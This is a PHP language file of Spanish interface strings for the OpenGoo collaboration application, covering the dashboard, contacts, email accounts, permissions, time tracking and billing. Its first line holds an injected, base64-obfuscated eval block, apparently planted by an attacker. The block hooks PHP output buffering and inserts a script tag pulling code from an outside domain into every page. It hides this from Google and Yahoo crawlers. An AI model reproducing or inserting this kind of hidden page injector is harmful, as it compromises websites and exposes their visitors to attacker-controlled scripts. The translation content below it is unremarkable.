<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  /**
  * Dashboard interface langs
  *
  * @version 1.0
  * @author Ilija Studen <ilija.studen@gmail.com>
  */
  
  // Return langs
  return array(
    'new OpenGoo version available' => 'Está disponible una nueva versión de OpenGoo. <a class="internalLink" href="{0}" onclick="{1}">Más detalles</a>.',
    
    'my tasks' => 'Mis tareas',
    'welcome back' => 'Bienvenido <strong>{0}</strong>',
    
    'online users' => 'Usuarios conectados',
    'online users desc' => 'Usuarios inactivos en los pasados 15 minutos:',
    
  	'charts' => 'Gráficas',
    'contacts' => 'Contactos',
    'dashboard' => 'Panel principal',
    'administration' => 'Administración',
    'my account' => 'Mi cuenta',
    'my documents' => 'Mis documentos',
	'documents' => 'Documentos',
    'my projects' => 'Mis áreas de trabajo',
    'my projects archive desc' => 'Listado de áreas de trabajo cerradas. Todas las acciones de estas áreas de trabajo han sido bloqueadas, de todas formas podrá verlos.',
    
    'company online' => 'Compañía en línea',
    
    'enable javascript' => 'Habilite JavaScript en su navegador para poder usar esta caracteristica',
    
    'user password generate' => 'Generar contraseña aleatoria',
    'user password specify' => 'Especifique contraseña',
    'is administrator' => 'Administrador',
    'is auto assign' => '¿Auto-asignar a nuevas áreas de trabajo?',
    'auto assign' => 'Auto -asignar',
    'administrator update profile notice' => 'Opciones de administador (sólo disponibles para administradores!)',
    
    'project completed on by' => 'Completado el {0} de {1}',
    
    'im service' => 'Servicio',
    'primary im service' => 'IM primario',
    'primary im description' => 'Todas las direciones IM introducidas serán listadas en su página de contactos. Sólo los IM primarios serán mostrados en otras páginas.',
    'contact online' => 'Contacto conectado',
    'contact offline' => 'Contacto no conectado',
    
    'avatar' => 'Imagen',
    'current avatar' => 'Imagen actual',
    'current logo' => 'Logo actual',
    'new avatar' => 'Imagen nueva',
    'new logo' => 'Nuevo logo',
    'new avatar notice' => 'Advertencia: la imagen nueva reemplazará la anterior borrándola permanentemente',
    'new logo notice' => 'Advertencia: el nuevo logo reemplazará al anterior borrándolo permanentemente',
    
    'days late' => '{0} días de retraso',
    'days left' => 'quedan {0} días ',
    
    'user card of' => 'Tarjeta del contacto: {0}',
    'company card of' => 'Tarjeta de la empresa: {0}',
    
    // Upgrade
    'upgrade is not available' => 'No hay nuevas versiones de OpenGoo',
    'check for upgrade now' => 'Verificar ahora',
    
    // Forgot password
    'forgot password' => 'Olvidó su contraseña',
    'email me my password' => 'Enviar contraseña',
    
    // Complete installation
    'complete installation' => 'Completar la instalación',
    'complete installation desc' => 'Éste es el paso final del proceso de instalación, que le permitirá crear una cuenta de administrador y proveer de una breve información sobre su empresa',
    
    // Administration
    'welcome to administration' => 'Bienvenido',
    'welcome to administration info' => 'Bienvenido al panel de administración. Esta herramienta le permitirá administrar los datos de su empresa, sus miembros, clientes y las áreas de trabajo a los que pertenece.',
    
    'send new account notification' => '¿Enviar notificación vía correo electrónico?',
    'send new account notification desc' => 'Si elige "Sí", el usuario recibirá un mensaje de bienvenida, vía correo electrónico, con los datos necesarios para conectarse (incluyendo la contraseña).',
    
    // Tools
    'administration tools' => 'Herramientas',
    
    'test mail recepient' => 'Destinatario de prueba de correo electrónico',
    'test mail message' => 'Mensaje de prueba',
    'test mail message subject' => 'Asunto de prueba',
    
    'massmailer subject' => 'Asunto',
    'massmailer message' => 'Nota',
    'massmailer recipients' => 'Destinatarios',
    
    // Dashboard
    'welcome to new account' => 'Bienvenido a su reciente creada cuenta',
    'welcome to new account info' => '{0}, bienvenido a su nueva cuenta. De ahora en adelante estará disponible en {1} (Puede almacenar este vínculo). Puede comenzar a utilizar su cuenta tras completar los siguientes pasos:',
    'new account step1' => 'Paso 1: Introduzca los datos de su empresa',
    'new account step1 info' => '<a class="internalLink" href="{0}">Fije los datos de su empresa</a> como son teléfono, número de fax, dirección, correo electrónico, sitio web, etc.',
    'new account step2' => 'Paso 2: Añada miembros a su equipo',
    'new account step2 info' => 'Usted puede <a class="internalLink" href="{0}">crear nuevas cuentas de usuarios</a> para todos los miembros de su equipo. Cada miembro obtendrá un nombre de usuario y una contraseña, que utilizará para acceder al sistema',
    'new account step3' => 'Paso 3: Añada empresas clientes y sus miembros',
    'new account step3 info' => 'Ahora <a class="internalLink" href="{0}">defina una empresa cliente</a>. Al finalizar puede añadir sus miembros o dejar que el encargado de ese grupo se encargue. Estos miembros son muy similares a los de su empresa, sólo que tienen acceso limitado a algunos contenidos y funciones (pueden establecerse distintos niveles de acceso a cada área de trabajo o miembro)',
    'new account step4' => 'Paso 4: Crear un área de trabajo',
    'new account step4 info' => 'Definir una <a class="internalLink" href="{0}"> nueva área de trabajo</a> es muy fácil: establezca un nombre y descripción (opcional) e introduzca los datos. A continuación podrá establecer los permisos de los miembros de su equipo y sus cientes.',
    
    // Application log
    'application log details column name' => 'Detalles',
    'application log project column name' => 'Área de trabajo',
    'application log taken on column name' => 'Adoptadado en relación con',
    
    // RSS
    'rss feeds' => 'Suministro RSS',
    'recent activities feed' => 'Actividades recientes',
    'recent project activities feed' => 'Actividades recientes en el área de trabajo {0}',
    
    // Update company permissions
    'update company permissions hint' => 'Marcar área de trabajo para dar permisos a esta empresa. Tenga en cuenta que también deberá establecer los permisos para aquellos miembros de la compañía que desea que tengan acceso al control de algunas áreas de trabajo (esto puede ser realizado a través de la página de usuarios en el área de trabajo, o a través de los perfiles).',
    
    'footer copy with homepage' => '&copy; {0} by <a class="internalLink" href="{1}">{2}</a>. Todos los derechos reservados.',
    'footer copy without homepage' => '&copy; {0} by {1}. Todos los derechos reservados',
    'footer powered' => 'Impulsado por <a target="_blank" href="{0}">{1}</a>',
	
	// Menu
	'all documents' => 'Todos los documentos',
	'created by me' => 'Creado por mí',
	'by project' => 'Por área de trabajo',
	'by tag' => 'Por etiqueta',
	'by type' => 'Por tipo',
	'recent documents' => 'Documentos recientes',
	'current project' => 'Área de trabajo actual',
	'show hide menu' => 'Mostrar/esconder menú',
	'help' => 'Ayuda',
  
  	'confirm leave page' => 'Si abandona o recarga nuevamente la página perderá los datos no cargados.',
  
  	//Contacts
  	'add contact' => 'Agregar contacto',
  	'edit contact' => 'Editar contacto',
    'update contact' => 'Actualizar contacto',
  	'update picture' => 'Actualizar imagen',
  	'delete contact' => 'Eliminar contacto',
  	'contact card of' => 'Tarjeta de contacto de',
  	'email address 2' => 'Dirección de correo electrónico 2',
  	'email address 3' => 'Dirección de correo electrónico 3',
  	'website' => 'Sitio web',
  	'notes' => 'Notas',
  	'assigned user' => 'Usuario asignado',
  	'contact information' => 'Información de contacto',
    'first name' => 'Primer nombre',
  	'last name' => 'Apellido',
  	'middle name' => 'Segundo nombre',
  	'contact title' => 'Título de contacto',
  	'work information' => 'Información de trabajo',
  	'department' => 'Departamento',
  	'job title' => 'Título',
  	'location' => 'Ubicación',
    'phone number' => 'Número de teléfono',
    'phone number 2' => 'Número de teléfono 2',
    'fax number' => 'Número de fax',
    'assistant number' => 'Número de asistente',
    'callback number' => 'Número de respuesta',
    'pager number' => 'Pager',
    'mobile number' => 'Número de teléfono móvil',
    'personal information' => 'Información personal',
    'home information' => 'Información de casa',
    'other information' => 'Otra información',
  
    'email and instant messaging' => 'Correo electrónico y mensajes instántaneos',
    'no contacts in project' => 'No existen contactos en esta área de trabajo',
  	'picture' => 'Imagen',
    'current picture' => 'Foto actual',
    'delete current picture' => 'Eliminar foto actual',
    'confirm delete current picture' => '¿Realmente desea eliminar la foto actual?',
    'new picture' => 'Foto nueva',
    'new picture notice' => 'Advertencia: la foto actual será eliminada y reemplazada por una nueva',
    
  	'assign to project' => 'Asignar al área de trabajo',
  	'role' => 'Rol',
    'contact projects' => 'Áreas de trabajo del contacto',
    'contact identifier required' => 'Los contactos deben estar definidos al menos por un nombre, o apellido',
    'birthday' => 'Fecha de nacimiento',
    'role in project' => 'Rol en esta área de trabajo \'{0}\'',
    'all contacts' => 'Todos los contactos',
    'project contacts' => 'Contactos en {0}', 
    'select' => 'Seleccione',

 	// Contact import
 	'import contacts from csv' => 'Importación de contactos desde archivos .csv',
	'import' => 'Importar',
 	'file not exists' => 'El archivo seleccionado no existe',
	'field delimiter' => 'Delimitador de campos (opcional)',
	'first record contains field names' => 'El primer registro contiene los nombres de los campos',
	'import contact success' => 'Importación de contactos exitosa.',
	'contact fields' => 'Campos de contactos',
	'fields from file' => 'Campos obtenidos del archivo',
	'you must match the database fields with file fields before executing the import process' => 'Debe asegurarse de que los campos de la base de datos coincidan con los campos especificados en el archivo.',  
	'import result' => 'Resultado de la importación',
	'contacts succesfully imported' => 'Contactos importados exitosamente',
	'contacts import fail' => 'Importación fallida para los contactos',
	'contacts import fail help' => 'El proceso de importación pudo haber fallado debido a datos existentes en la base de datos, como nombre, email, etc.',
	'import fail reason' => 'Motivo del fallo',
	'select a file in order to load its data' => 'Seleccione un archivo csv para poder cargar la información del mismo.',
  
  	// Contact export
  	'export contacts to csv' => 'Exportación de contactos a archivos .csv',
	'export' => 'Exportar',
	'fields to export' => 'Datos a exportar',
	'success export contacts' => 'Los contactos se han exportado existosamente',

	// Company import/export
	'import companies from csv' => 'Importación de empresas desde archivos .csv',
	'company fields' => 'Campos de empresas',
	'companies succesfully imported' => 'Empresas importadas exitosamente',
	'companies import fail' => 'Importación fallida para las empresas',
	'export companies to csv' => 'Exportación de empresas a archivos .csv',
	'success export companies' => 'Las empresas se han exportado existosamente',
  
  //Webpages
  'add webpage' => 'Añadir enlace web',
  'delete webpage' => 'Eliminar enlace web',
  'webpages' => 'Enlaces web',
  'private webpage' => 'Enlace web privado',
  'url' => 'URL',
  'no active webpages in project' => 'No se encontraron enlaces web en esta área de trabajo',
  'webpage list description' => 'Descripción',
  'edit webpage' => 'Editar enlace web',
  'webpage' => 'Enlace web',
  'webpage title required' => 'Título obligatorio para en enlace web',
  'webpage url required' => 'Es necesario introducir la URL',
    
  //Email
  'emails' => 'Correos',
  'add mail account' => 'Agregar cuenta de correo electrónico',
  'new mail account' => 'Nueva cuenta de correo electrónico',
  'no emails in this account' => 'No hay correos electrónicos en esta cuenta',
  'server address' => 'Dirección del servidor',
  'mail account id' => 'Identificación de cuenta',
  'mail account name' => 'Nombre de la cuenta',
  'is imap' => 'Esta es una cuenta IMAP',
  'incoming ssl' => 'Use SSL para conexiones de correo entrantes',
  'incoming ssl port' => 'Puerto SSL',
  'edit mail account' => 'Editar cuenta de correo electrónico',
  'delete mail account' => 'Eliminar cuenta de correo electrónico',
  'subject' => 'Asunto',
  'email' => 'Ver correo electrónico',
  'from' => 'De',
  'to' => 'Para',
  'date' => 'Fecha',
  'delete email' => 'Eliminar correo electrónico',
  'email message' => 'Correo electrónico',
  'imap' => 'IMAP',
  'pop3' => 'POP3',
  'email connection method' => 'Modo de conexión',
  'classify' => 'Clasificar',
  'classify email' => 'Clasificar correo electrónico',
  'classify email subject' => 'Clasificar correo: \'{0}\'',
  'add attachments to project' => 'Agregar un adjunto al área de trabajo',
  'project emails' => '{0} correos electrónicos',
  'edit email account' => 'Editar {0}',
  'no emails in this project' => 'No hay correos electrónicos en esta área de trabajo',
  'mail content' => 'Correo',
  'mail account name description' => 'El nombre usado para identificar esta cuenta (ej. \'Cuenta personal\')',
  'mail account id description' => 'El nombre de usuario de la cuenta o identificación usada para conectarse al servidor (ej. \'juan@servidor.com\')',
  'mail account password description' => 'La contraseña obligatoria para conectarse a la cuenta',
  'mail account server description' => 'La dirección del serivdor de correo electrónico (ej. \'pop3.servidor.com\')',
  'folders to check' => 'Carpetas a verificar',
  'after' => 'luego de',
  'delete mails from server' => 'Eliminar correos del serviror',
  'mail account delete mails from server description' => 'Habilite esta opción para que los correos sean eliminados del servidor luego de cierto tiempo.',
  
  //Checkout
  'checkout file' => 'Bloquear archivo',
  'checkin file' => 'Liberar archivo',
  
  'new filename' => 'Nuevo nombre de archivo',
  'add as revision' => 'Añadir como revision',
  'duplicate filename' => 'Duplicar nombre de archivo',
  'filename exists' => 'Ya existen archivos bajo ese nombre. Puede cambiar el nombre, o elegir entre las siguientes opciones',
  'filename exists edit' => 'Ya existe un archivo con ese nombre. Por favor, eliga un nuevo nombre.',
  'checking filename' => 'Verificando disponibilidad...',
  'check' => 'Verificar',
  'add file check in' => 'Liberar como una nueva versión del archivo',
  'filters' => 'Filtros',
  
  'permissions for user' => 'Permisos para el usuario {0}',
  'can read messages' => 'Puede leer notas',
  'can write messages' => 'Puede escribir notas',
  'can read tasks' => 'Puede leer tareas',
  'can write tasks' => 'Puede escribir tareas',
  'can read milestones' => 'Puede leer hitos',
  'can write milestones' => 'Puede escribir hitos',
  'can read mails' => 'Puede leer correos electrónicos',
  'can write mails' => 'Puede escribir correos electrónicos',
  'can read comments' => 'Puede leer comentarios',
  'can write comments' => 'Puede escribir comentarios',
  'can read contacts' => 'Puede leer contactos',
  'can write contacts' => 'Puede escribir contactos',
  'can read weblinks' => 'Puede leer enlaces web',
  'can write weblinks' => 'Puede añadir enlaces web',
  'can read files' => 'Puede leer archivos',
  'can write files' => 'Puede escribir archivos',
  'can read events' => 'Puede leer eventos',
  'can write events' => 'Puede escribir eventos',
  
  'new mail account' => 'Nueva cuenta de correo electrónico',
  'new company' => 'Nueva empresa',
  'new workspace' => 'Nueva área de trabajo',
  'new task list' => 'Nueva tarea',
  'new event' => 'Nuevo evento',
  'new webpage' => 'Nuevo enlace web',
  'new milestone' => 'Nuevo hito',
  'new message' => 'Nueva nota',
  'new group' => 'Grupo nuevo',
  'new user' => 'Usuario nuevo',
  'add tags' => 'añadir etiquetas',
  'save changes' => 'Guardar cambios',
  'administrator options' => 'Opciones de administrador',
  
  'system permissions' => 'Permisos del sistema',
  'project permissions' => 'Permisos del área de trabajo',
  
  
  /* Search */
  
  'actions' => 'Acciones',
  'edit properties' => 'Editar propiedades',
  'you' => 'Usted',
  'created by' => 'Creado por',
  'modified by' => 'Modificado por',
  'user date' => '<a class="internalLink" href="{0}" title="Ver perfil de {3}">{1}</a>, el {2}',
  'user date today at' => '<a class="internalLink" href="{0}" title="Ver perfil de {3}">{1}</a>, hoy a las {2}',
  'today at' => 'Hoy, a las {0}',
  'created by on' => 'Creado por <a class="internalLink" href="{0}">{1}</a> el {2}',
  'modified by on' => 'Modificado por <a class="internalLink" href="{0}">{1}</a> el {2}',
  'modified by on short' => '<a class="internalLink" href="{0}">{1}</a>, {2}',
  'created by on short' => '<a class="internalLink" href="{0}">{1}</a>, {2}',
  'time used in search' => 'La busqueda fue realizada en {0} segundos',
  'more results' => 'Hay otros {0} resultados...',
  
  
  'parent workspace' => 'Área de trabajo padre',
  'close' => 'Cerrar',
  'all projects' => 'Todas las áreas de trabajo',
  'view as list' => 'Listar',
  'pending tasks' => 'Tareas pendientes',
  'messages' => 'Notas',
  'complete' => 'Completo',
  'incomplete' => 'Incompleto',
  'complete task' => 'Completar tarea',
  'complete milestone' => 'Completar hito',
  'subtask count all open' => '{0} sub-tareas, {1} aún abiertas',
  'due in x days' => 'Vence en {0} días',
  'overdue by x days' => 'Sobrepasó el límite {0} días',
  'due today' => 'A entregar hoy',
  
  'x years' => '{0} años',
  'x months' => '{0} meses',
  'x weeks' => '{0} semanas',
  'x days' => '{0} días',
  'x hours' => '{0} horas',
  'x minutes' => '{0} minutos',
  'x seconds' => '{0} segundos',
  '1 year' => '1 año',
  '1 month' => '1 mes',
  '1 week' => '1 semana',
  '1 day' => '1 día',
  '1 hour' => '1 hora',
  '1 minute' => '1 minuto',
  '1 second' => '1 segundo',
  
  'x ago' => 'pasados {0}',
  
  'object time slots' => 'Registro de tiempo de trabajo',
  'start work' => 'Comenzar trabajo',
  'end work' => 'Finalizar trabajo',
  'confirm delete timeslot' => '¿Está seguro de que desea eliminar este tiempo de trabajo?',
  'confirm cancel timeslot' => '¿Está seguro de que desea cancelar el actual tiempo de trabajo?',
  'success open timeslot' => 'Tiempo de trabajo abierto de forma satisfactoria',
  'success close timeslot' => 'Tiempo de trabajo cerrado de forma satisfactoria',
  'success cancel timeslot' => 'Tiempo de trabajo cancelado de forma satisfactoria',
  'success delete timeslot' => 'Tiempo de trabajo eliminado de forma satisfactoria',
  'success edit timeslot' => 'Tiempo de trabajo editado de forma satisfactoria',
  'open timeslot message' => 'Tiempo de trabajo realizado:',
  'success pause timeslot' => 'Tiempo de trabajo pausado de forma satisfactoria',
  'success resume timeslot' => 'Tiempo de trabajo retomado de forma satisfactoria',
  'paused timeslot message' => 'Tiempo de trabajo pausado, tiempo total: {0}',
  'time since pause' => 'Tiempo desde la pausa',
  'pause work' => 'Pausar',
  'resume work' => 'Retomar',
  'end work description' => 'Finalizar con la descripción del trabajo',
  'add timeslot' => 'Añadir tiempo de trabajo',
  'edit timeslot' => 'Editar tiempo de trabajo',
  'start date' => 'Fecha de comienzo',
  'start time' => 'Hora de comienzo',
  'end date' => 'Fecha de fin',
  'end time' => 'Hora de fin',
  
  'tasks in progress' => 'Tareas en progreso',
  'upcoming events milestones and tasks' => 'Próximos eventos, hitos y tareas',
  
  'undo checkout' => 'Deshacer bloqueo de archivo',
  
  'search for in project' => 'Buscar resultados para \'<i>{0}</i>\' en el área de trabajo \'{1}\'',
  'search for' => 'Buscar resultados para \'{0}\' en todas las áreas de trabajo',
  
  'workspace permamanent delete' =>  'Cuando un área de trabajo es eliminada, la siguiente información se perderá permanentemente</b>',
  'workspace permamanent delete messages'  => ' Todos las notas en el área de trabajo',
  'workspace permamanent delete tasks' => ' Todas las tareas en el área de trabajo',
  'workspace permamanent delete milestones' => ' Todos los hitos en el área de trabajo',
  'workspace permamanent delete files' => ' Todos los archivos en el área de trabajo',
  'workspace permamanent delete logs' => ' Todos los registros relacionados con el área de trabajo',
  'workspace permamanent delete mails' => ' Todos los correos electrónicos serán desasociados de esta área de trabajo, pero permanecerán en el sistema.',
  'sub-workspaces permament delete' => '<b>{0} sub-área(s) de trabajo</b> de {1} también serán eliminadas, con todo su contenido.',
  'multiples workspace object permanent delete' => 'Aquellos objetos contenidos en más de un área de trabajo no serán eliminados.',
  'cancel permanent delete' => 'Para cancelar la eliminación presione "Volver", o cierre esta ventana.',
  'confirm permanent delete workspace' => 'Por favor, confirme su deseo de eliminar esta área de trabajo <b>{0}</b>',
  
  'latest user activity' => 'Última actividad del usuario',
  
  'hours' => 'Horas',
  'minutes' => 'Minutos',
  'seconds' => 'Segundos',
  'days' => 'Días',
  'time estimate' => 'Tiempo estimado',
  'work in progress' => 'Trabajo en progreso',
  'total time' => 'Tiempo total',
  
  'upload anyway' => 'Subir de todas formas',
  
  'print view' => 'Vista de impresión',
  'activity' => 'Actividad',
  'statistics' => 'Estadísticas',
  'time' => 'Tiempo',
  'task time report' => 'Tiempo total de ejecución',
  'new tasks by user' => 'Nuevas tareas por usuario',
  'generate report' => 'Generar reporte',
  'task title' => 'Título de la tarea',
  'total time' => 'Tiempo total',
  'include subworkspaces' => 'Incluir subáreas',
  'print' => 'Imprimir',
  'this week' => 'Esta semana',
  'last week' => 'Semana pasada',
  'this month' => 'Este mes',
  'last month' => 'Mes pasado',
  'select dates...' => 'Elegir fechas...',
  
  'task time report description' => 'Este reporte realiza un resumen del tiempo trabajado por tareas. Se especifica un rango de fechas, usuario (opcional) y área de trabajo.',
  'no data to display' => 'No hay datos para desplegar',
  'last updated by on' => '{0}, en {1}',
  'updated' => 'Actualizado',
  
  'add a new company' => 'Añadir una nueva compañía',
    'my pending tasks' => 'Mis tareas pendientes',
    'success create timeslot' => 'Tiempo de trabajo creado en forma satisfactoria',
    'new company name' => 'Nuevo nombre de compañía',
    'checking' => 'Verificando',
    'country' => 'País',
    'email addresses' => 'Dirección de correo electrónico',
    'instant messaging' => 'Mensajería instantánea',
    'phone' => 'Teléfono',
    'phone 2' => 'Teléfono 2',
    'fax' => 'Fax',
    'assistant' => 'Asistente',
    'callback' => 'Llamado',
    'mobile' => 'Móvil',
    'pager' => 'Pager',
    'roles' => 'Roles',
    'group by' => 'Agrupar por',
    'total' => 'Total',
  
  'user subscribed to object' => 'Está suscripto a este objeto.',
  'user not subscribed to object' => 'No está suscripto a este objeto.',
  
  'tasks updated' => 'Tareas(s) actualizadas exitosamente',
  'show image in new page' => 'Mostrar imagen en nueva página',
  'no tasks to display' => 'No hay tareas para mostrar',
  'total' => 'Total',
  'too many tasks to display' => 'Hay demasiadas tareas para mostrar, se despliegan las 500 tareas más recientes. Para mostrar las tareas y ocultar esta advertencia, por favor filtre las tareas por área de trabajo, tag, estado o filtro.',
  'enter tags desc' => 'Ingrese etiquetas separadas por coma ...',
  'do complete' => 'Completar',
  
  'task data' => 'Datos de tarea',
  'search in all workspaces' => 'Buscar en todas las áreas de trabajo',
  
  'total pause time' => 'Tiempo total pausado',
  'pause time cannot be negative' => 'El tiempo de pausa no puede ser negativo',
  'pause time cannot exceed timeslot time' => 'El tiempo de pausa no puede exceder el tiempo total de trabajo',
  'timeslots' => 'Tiempos de trabajo',
  
  'task timeslots' => 'Tiempos de trabajo de tareas',
  'time timeslots' => 'Tiempos de trabajo generales',
  'all timeslots' => 'Todos los tiempos de trabajo',
  
  'print report' => 'Imprimir reporte',
  
  'all active tasks' => 'Todas las tareas activas',
  
  'unique id' => 'Id único',
  
  'my pending tasks' => 'Mis tareas pendientes',
  'pending tasks for' => 'Tareas pendientes de {0}',
  'my late milestones and tasks' => 'Mis hitos y tareas atrasadas',
  'late milestones and tasks for' => 'Hitos y tareas atrasadas de {0}',
  'my tasks in progress' => 'Mis tareas activas',
  'tasks in progress for' => 'Tareas activas de {0}',
  
  'time has to be greater than 0' => 'El tiempo tiene que ser mayor que 0',
  'edit picture' => 'Editar imagen',
  'deleted by' => 'Eliminado por',
  
  'release notes' => 'Notas de la versión',
  'remember last' => 'Recordar último',
  'auto' => 'Auto',
  'print all groups' => 'Imprimir todos los grupos',
  'shared with' => 'Compartido con',
  
  'share object desc' => 'Se enviará un correo invitando a cada persona.',
  'share with' => 'Compartir con',
  'allow people edit object' => 'Permitir editar el objeto',
  'must specify recipients' => 'Debe especificar al menos una dirección de correo',
  'share' => 'Compartir',
  'share this' => 'Compartir este',
  'success sharing object' => 'Objeto compartido exitosamente',
  'actually sharing with' => 'Ya está siendo compartido con',
  'share notification message desc' => '{1} lo ha invitado a ver/editar esta nota: {0}',
  'share notification event desc' => '{1} lo ha invitado a ver/editar este evento: {0}',
  'share notification task desc' => '{1} lo ha invitado a ver/editar esta tarea: {0}',
  'share notification document desc' => '{1} lo ha invitado a ver/editar este documento: {0}',
  'share notification contact desc' => '{1} lo ha invitado a ver/editar este contacto: {0}',
  'share notification company desc' => '{1} lo ha invitado a ver/editar esta empresa: {0}',
  'share notification emailunclassified desc' => '{1} lo ha invitado a ver/editar este correo: {0}',
  'share notification email desc' => '{1} lo ha invitado a ver/editar este correo: {0}',
  'new share notification message' => 'Nota \'{0}\' ha sido compartida',
  'new share notification event' => 'Evento \'{0}\' ha sido compartido',
  'new share notification task' => 'Tarea \'{0}\' ha sido compartida',
  'new share notification document' => 'Documento \'{0}\' ha sido compartido',
  'new share notification contact' => 'Contacto \'{0}\' ha sido compartido',
  'new share notification company' => 'Empresa \'{0}\' ha sido compartida',
  'new share notification emailunclassified' => 'Correo \'{0}\' ha sido compartido',
  'new share notification email' => 'Correo \'{0}\' ha sido compartido',
  
  
  'billing' => 'Facturacion',
  'category' => 'Categoría',
  'hourly rates' => 'Tarifas horarias',
  'origin' => 'Origen',
  'default hourly rates' => 'Tarifa horaria por defecto',
  'add billing category' => 'Agregar categoría de facturación',
  'new billing category' => 'Nueva categoría de facturación',
  'edit billing category' => 'Editar categoría de facturación',
  'report name' => 'Nombre a desplegar en reportes',
  'billing categories' => 'Categorías de facturación',
  'billing category' => 'Categoría de facturación',
  'select billing category' => '-- Seleccionar categoría de facturación --',
  'billing amount' => 'Monto',
  'hourly billing' => 'Facturación por hora',
  'fixed billing' => 'Facturación fija',
  'show billing information' => 'Mostrar información de facturación',
  'no billing categories' => 'No hay categorías de facturación.',
